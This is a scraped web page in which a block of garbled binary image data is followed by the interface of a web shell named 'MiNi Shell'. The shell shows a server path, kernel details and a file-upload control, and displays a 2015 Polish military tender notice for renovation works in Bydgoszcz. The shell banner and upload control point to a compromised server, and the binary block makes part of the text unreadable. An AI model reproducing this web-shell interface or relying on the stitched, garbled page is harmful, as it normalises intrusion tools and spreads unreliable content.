JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150410/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150410/50195-N-2015.html

<p class="kh_header"><b>Bydgoszcz: Przedmiotem zamówienia jest: 
Konserwacja ogólnobudowlana części pomieszczeń bud. nr 8 ul. Powstańców Warszawy 2 oraz remont pomieszczeń w budynkach żandarmerii w Bydgoszczy
z podziałem na części.</b><br>
<b>Numer ogłoszenia: 50195 - 2015; data zamieszczenia: 10.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 11 Wojskowy Oddział Gospodarczy , ul. Gdańska 147, 85-915 Bydgoszcz, woj. kujawsko-pomorskie, tel. 52 378 13 19, faks 52 378 13 13.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.11wog.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Wojskowa Jednostka Budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest: 
Konserwacja ogólnobudowlana części pomieszczeń bud. nr 8 ul. Powstańców Warszawy 2 oraz remont pomieszczeń w budynkach żandarmerii w Bydgoszczy
z podziałem na części..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: 
Konserwacja ogólnobudowlana części pomieszczeń bud. nr 8 ul. Powstańców Warszawy 2 oraz remont pomieszczeń w budynkach żandarmerii w Bydgoszczy
z podziałem na części:

Część 1: Konserwacja ogólnobudowlana części pomieszczeń w budynku nr 8 kompleksu wojskowego przy ul. Powstańców Warszawy 2 w Bydgoszczy
Roboty ogólnobudowlane obejmują między innymi:
	miejscowe usunięcie luźnego odspojonego tynku,
	wykonanie podkładu cementowego pod izolacje,
	wykonanie izolacji przeciwwilgociowych pionowych ścian,
	zeskrobanie i zmycie starej farby w pomieszczeniach,
	wykonanie tynków wewnętrznych na ścianach w miejscach uprzednio usuniętego,
	gruntowanie powierzchni poziomych i pionowych preparatami ATLAS UNI GRUNT,
	dwukrotne malowanie: farbą emulsyjną ścian i sufitów, farbami olejnymi ścian, stolarki drzwiowej i  krat, farbą chlorokauczukową posadzki betonowej 
	wywóz i utylizacja gruzu.
      Główny przedmiot zamówienia 
CPV - 45000000 - 7	(roboty budowlane)

Część 2: Remont części pomieszczeń w budynkach nr 2 i 12 kompleksu wojskowego przy ul. Zygmunta Augusta 20a w Bydgoszczy na potrzeby Oddziału Żandarmerii Wojskowej
Roboty ogólnobudowlane obejmują między innymi:
	wykucie z muru: ościeżnic stalowych, drzwi z PCV, okna podawczego,
	rozebranie: ścianek z cegieł, posadzki oraz okładziny ściennej z płytek na zaprawie cementowej,
	demontaż sufitu podwieszanego z płyt gipsowych,
	zerwanie: posadzek z tworzyw sztucznych, cokolika cementowego,
	wykucie otworów w ścianach,
	wykonanie przesklepień otworów,
	zeskrobanie i zmycie starej farby w pomieszczeniach,
	uzupełnienie ścianek z cegieł,
	montaż okna podawczego z szybą fenicką i kuloodporną,
	wykonanie tynków zwykłych wewnętrznych,
	wykonanie izolacji przeciwwilgociowych poziomych i pionowych,
	gruntowanie powierzchni poziomych i pionowych preparatami ATLAS UNI GRUNT,
	wzmocnienie tynku poprzez przyklejenie warstwy siatki na ścianach klejem ATLAS STOPTER,
	wykonanie gładzi gipsowej na ścianach i sufitach,
	ręczne wykonanie cienkowarstwowej wyprawy z tynku mineralnego oraz tynku mozaikowego,
	wykonanie posadzek: płytkowych z kamieni sztucznych, z płyt granitowych, epoksydowo -  kwarcowej ozdobnej antypoślizgowej, 
	licowanie ścian płytkami oraz osadzenie listew aluminiowych wykończeniowych,
	osadzenie ościeżnic oraz montaż skrzydeł drzwiowych drewnianych i aluminiowych,
	wymiana parapetów wewnętrznych,
	dwukrotne malowanie: farbą emulsyjną tynków wewnętrznych, farbą olejną rur,
	montaż sufitów podwieszanych z płyt gipsowych,
	montaż tulei wentylacyjnych z PCV, dostawa i montaż luster, montaż listwy aluminiowej drzwiowej,
	wywiezienie i utylizacja gruzu.
Roboty wodnokanalizacyjne i centralnego ogrzewania obejmują:
	demontaż zbędnej instalacji oraz wymiana wyeksploatowanych, zużytych odcinków istniejącej instalacji wodociągowej i kanalizacyjnej,
	wymiana grzejników żeliwnych na stalowe, montaż zaworów grzejnikowych z głowicą termostatyczną,
	montaż wentylatorów wyciągowych kanałowych, klimatyzatorów.

Roboty elektryczne obejmują:
	roboty w zakresie demontażu i montażu: drzwiczek rozdzielnic elektrycznych, opraw oświetleniowych, osprzętu elektrycznego,
	montaż nowej instalacji elektrycznej,
	montaż osprzętu modułowego w rozdzielnicach elektrycznych
	wykonanie prób i badań pomiarowych.   

      Główny przedmiot zamówienia 
CPV - 45000000 - 7	(roboty budowlane)

      Dodatkowe przedmioty zamówienia 
CPV - 45332000 - 3	(roboty instalacyjne wodne i kanalizacyjne)
CPV - 45331000 - 6 	(instalowanie urządzeń grzewczych, wentylacyjnych 
i klimatyzacyjnych)
CPV - 45311000 - 0 	(roboty w zakresie przewodów instalacji elektrycznych oraz opraw elektrycznych)

UWAGA dot. części 2: Ze względu na charakter prac (kontynuacja remontu pomieszczeń) zaleca się dokonanie wizji lokalnej w celu właściwej wyceny materiałów przyjętych do oferty..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.33.20.00-3, 45.33.10.00-6, 45.31.10.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Przystępując do postępowania, Wykonawca ma obowiązek wnieść wadium 
w wysokości: 
1)	Część 1 - 400,00 zł (słownie: czterysta złotych 00/100);
2)	Część 2 - 5.000,00 zł (słownie: pięć tysięcy złotych 00/100);
2.	Wykonawca może wnieść wadium w jednej lub kilku następujących formach: 
1)	w pieniądzu, 
2)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
3)	w gwarancjach bankowych, 
4)	w gwarancjach ubezpieczeniowych, 
5)	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z  dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U.  z  2014 r., poz. 1146). 
3.	Wadium musi być złożone lub wpłynąć na rachunek Zamawiającego 
przed upływem terminu składania ofert.
4.	Wykonawca zobowiązany jest wnieść wadium co najmniej na okres związania ofertą.
Wadium wnoszone w formie pieniężnej należy wpłacać na rachunek Zamawiającego - 11 Wojskowy Oddział Gospodarczy w Bydgoszczy -  NBP O/O BYDGOSZCZ 27 1010 1078 0106 2113 9120 1000 z dopiskiem wadium sprawa nr  14/ZP/RB/INFR/2015 - część nr 
Przy czym za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania rachunku Zamawiającego. Kserokopię dokumentu potwierdzającego dokonanie przelewu pieniężnego Wykonawca winien dołączyć do oferty. 
5.	Wadium wnoszone w innej formie niż pieniężna należy złożyć przed upływem terminu składania ofert w formie oryginału do głównego księgowego Zamawiającego w bud. nr 108 (w dni robocze od poniedziałku do  piątku 
w godz. 08:00 - 14:00), a do oferty dołączyć kopię dokumentu potwierdzoną 
za zgodność z oryginałem.
6.	Wadium wnoszone w formach innych niż w pieniądzu, winno gwarantować Zamawiającemu wypłatę pełnej kwoty wadium, w przypadku zaistnienia okoliczności wskazanych w art. 46 ust. 4a i  5 ustawy na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą.
7.	Niedopuszczalne jest wprowadzanie jakichkolwiek warunków ograniczających Zamawiającemu wypłacenie wadium. 
8.	W przypadku składania wadium w formie gwarancji lub poręczenia 
przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia zaleca się wymienienie wszystkich Wykonawców występujących wspólnie.
9.	Wykonawca, którego oferta przed upływem terminu składania ofert nie będzie zabezpieczona dopuszczalną formą wadium zostanie wykluczony z postępowania w trybie art. 24 ust. 2 pkt 2 ustawy, a jego oferta  zostanie przez Zamawiającego uznana za odrzuconą.
10.	Zwrotu wadium Zamawiający dokona zgodnie z art. 46 ustawy:
1)	wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej 
lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza,
2)	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza Zmawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesienia zabezpieczenia należytego wykonania umowy,
3)	na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
11.	 W przypadku, gdy wadium zostało wpłacone w formie pieniężnej zostanie ono zwrócone Wykonawcy na rachunek bankowy, z którego dokonano wpłaty.
12.	Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium, w okolicznościach o których mowa w części VIII SIWZ w pkt. 10 ppkt 1, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana 
jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym 
przez Zamawiającego.
13.	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwróci je, wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
14.	Zamawiający zatrzymuje wadium, jeżeli:
1)	Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, 
o których mowa w art. 25 ust. 1, pełnomocnictw, listy podmiotów należących 
do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt. 5, 
lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3, co spowodowało brak możliwości wybrania oferty złożonej przez Wykonawcę 
jako najkorzystniejszej, 
2)	Wykonawca, którego oferta została wybrana odmówił podpisania umowy 
w sprawie zamówienia publicznego na warunkach określonych w ofercie,
3)	Wykonawca, którego oferta została wybrana nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
4)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe 
z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek udziału w postępowaniu w zakresie posiadania uprawnień 
do wykonywania określonej działalności lub czynności jeżeli przepisy prawa nakładają obowiązek ich posiadania zostanie uznany za spełniony, 
gdy Wykonawca złoży oświadczenie o spełnianiu warunku;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania wiedzy i doświadczenia zostanie uznany za spełniony, 
gdy Wykonawca złoży oświadczenie o spełnianiu warunku;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania odpowiednim potencjałem technicznym 
do wykonania zamówienia zostanie uznany za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunku;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-  w zakresie części 1 - Warunek dysponowania odpowiednimi osobami zdolnymi do wykonania zamówienia zostanie uznany za spełniony, jeżeli Wykonawca złoży oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
- w zakresie części 2 - Warunek dysponowania odpowiednimi osobami zdolnymi do wykonania zamówienia zostanie uznany za spełniony, jeżeli Wykonawca złoży oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień oraz Wykonawca wykaże, że dysponuje: pracownikami posiadającymi poświadczenie bezpieczeństwa lub upoważnienie do dostępu do informacji niejawnych 
o klauzuli ZASTRZEŻONE z terminem ważności w okresie obowiązywania przedmiotowej umowy i aktualne zaświadczenie o przeszkoleniu 
w zakresie ochrony informacji niejawnych. Na spełnieni warunku Wykonawca złoży uzupełniony wykaz osób.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący sytuacji ekonomicznej i finansowej zostanie uznany 
za spełniony, gdy Wykonawca złoży oświadczenie o spełnieniu warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- oświadczenie o spełnieniu wymogów ustawy z dnia 14 grudnia 2012 r. 
o odpadach (Dz. U. z 2013 r. poz. 21);
- wypełniony i podpisany formularz ofertowy (zaleca się wg wzoru) o treści załącznika nr 20 do SIWZ;
- kosztorysy ofertowe zgodne z załączonymi przedmiarami;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Gwarancja - 5</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.11wog.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 11 Wojskowy Oddział Gospodarczy ul. Gdańska 147, 
85-915 Bydgoszcz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.04.2015 godzina 09:00, miejsce: 11 Wojskowy Oddział Gospodarczy ul. Gdańska 147, 
85-915 Bydgoszcz - kancelaria jawna. Godz. pracy kancelarii 7.30 - 9.00 
i 12.30 - 15.15 w dni robocze od poniedziałku do piątku..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Konserwacja ogólnobudowlana części pomieszczeń w budynku nr 8 kompleksu wojskowego przy ul. Powstańców Warszawy 2 w Bydgoszczy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty ogólnobudowlane obejmują między innymi:
	miejscowe usunięcie luźnego odspojonego tynku,
	wykonanie podkładu cementowego pod izolacje,
	wykonanie izolacji przeciwwilgociowych pionowych ścian,
	zeskrobanie i zmycie starej farby w pomieszczeniach,
	wykonanie tynków wewnętrznych na ścianach w miejscach uprzednio usuniętego,
	gruntowanie powierzchni poziomych i pionowych preparatami ATLAS UNI GRUNT,
	dwukrotne malowanie: farbą emulsyjną ścian i sufitów, farbami olejnymi ścian, stolarki drzwiowej i  krat, farbą chlorokauczukową posadzki betonowej 
wywóz i utylizacja gruzu.
      Główny przedmiot zamówienia 
CPV - 45000000 - 7	(roboty budowlane).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 20.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Gwarancja - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remont części pomieszczeń w budynkach nr 2 i 12 kompleksu wojskowego przy ul. Zygmunta Augusta 20a w Bydgoszczy na potrzeby Oddziału Żandarmerii Wojskowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty ogólnobudowlane obejmują między innymi:
	wykucie z muru: ościeżnic stalowych, drzwi z PCV, okna podawczego,
	rozebranie: ścianek z cegieł, posadzki oraz okładziny ściennej z płytek na zaprawie cementowej,
	demontaż sufitu podwieszanego z płyt gipsowych,
	zerwanie: posadzek z tworzyw sztucznych, cokolika cementowego,
	wykucie otworów w ścianach,
	wykonanie przesklepień otworów,
	zeskrobanie i zmycie starej farby w pomieszczeniach,
	uzupełnienie ścianek z cegieł,
	montaż okna podawczego z szybą fenicką i kuloodporną,
	wykonanie tynków zwykłych wewnętrznych,
	wykonanie izolacji przeciwwilgociowych poziomych i pionowych,
	gruntowanie powierzchni poziomych i pionowych preparatami ATLAS UNI GRUNT,
	wzmocnienie tynku poprzez przyklejenie warstwy siatki na ścianach klejem ATLAS STOPTER,
	wykonanie gładzi gipsowej na ścianach i sufitach,
	ręczne wykonanie cienkowarstwowej wyprawy z tynku mineralnego oraz tynku mozaikowego,
	wykonanie posadzek: płytkowych z kamieni sztucznych, z płyt granitowych, epoksydowo -  kwarcowej ozdobnej antypoślizgowej, 
	licowanie ścian płytkami oraz osadzenie listew aluminiowych wykończeniowych,
	osadzenie ościeżnic oraz montaż skrzydeł drzwiowych drewnianych i aluminiowych,
	wymiana parapetów wewnętrznych,
	dwukrotne malowanie: farbą emulsyjną tynków wewnętrznych, farbą olejną rur,
	montaż sufitów podwieszanych z płyt gipsowych,
	montaż tulei wentylacyjnych z PCV, dostawa i montaż luster, montaż listwy aluminiowej drzwiowej,
	wywiezienie i utylizacja gruzu.
Roboty wodnokanalizacyjne i centralnego ogrzewania obejmują:
	demontaż zbędnej instalacji oraz wymiana wyeksploatowanych, zużytych odcinków istniejącej instalacji wodociągowej i kanalizacyjnej,
	wymiana grzejników żeliwnych na stalowe, montaż zaworów grzejnikowych z głowicą termostatyczną,
	montaż wentylatorów wyciągowych kanałowych, klimatyzatorów.

Roboty elektryczne obejmują:
	roboty w zakresie demontażu i montażu: drzwiczek rozdzielnic elektrycznych, opraw oświetleniowych, osprzętu elektrycznego,
	montaż nowej instalacji elektrycznej,
	montaż osprzętu modułowego w rozdzielnicach elektrycznych
	wykonanie prób i badań pomiarowych.   

      Główny przedmiot zamówienia 
CPV - 45000000 - 7	(roboty budowlane)

      Dodatkowe przedmioty zamówienia 
CPV - 45332000 - 3	(roboty instalacyjne wodne i kanalizacyjne)
CPV - 45331000 - 6 	(instalowanie urządzeń grzewczych, wentylacyjnych 
i klimatyzacyjnych)
